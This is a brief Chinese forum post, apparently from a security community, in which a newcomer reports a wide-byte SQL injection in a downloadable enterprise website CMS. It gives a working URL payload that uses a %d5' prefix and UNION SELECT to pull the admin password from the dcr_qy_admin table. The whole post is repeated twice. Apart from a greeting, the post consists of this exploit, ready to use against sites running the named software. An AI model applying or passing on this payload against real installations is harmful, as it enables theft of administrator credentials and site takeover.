By:毅心毅意
大家好啊。。。我是新人。。希望大家多多关照……
偶然在站长下载站下了一套企业建站程序,发现人气还蛮高的。
下载地址:
http://down.chinaz.com/soft/26802.htm
就去测试一下发现了一个宽字节注入漏洞。
http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23
爆密码的效果如图:
第一次在t00ls发帖..哈哈
By:毅心毅意
大家好啊。。。我是新人。。希望大家多多关照……
偶然在站长下载站下了一套企业建站程序,发现人气还蛮高的。
下载地址:
http://down.chinaz.com/soft/26802.htm
就去测试一下发现了一个宽字节注入漏洞。
http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23
爆密码的效果如图:
第一次在t00ls发帖..哈哈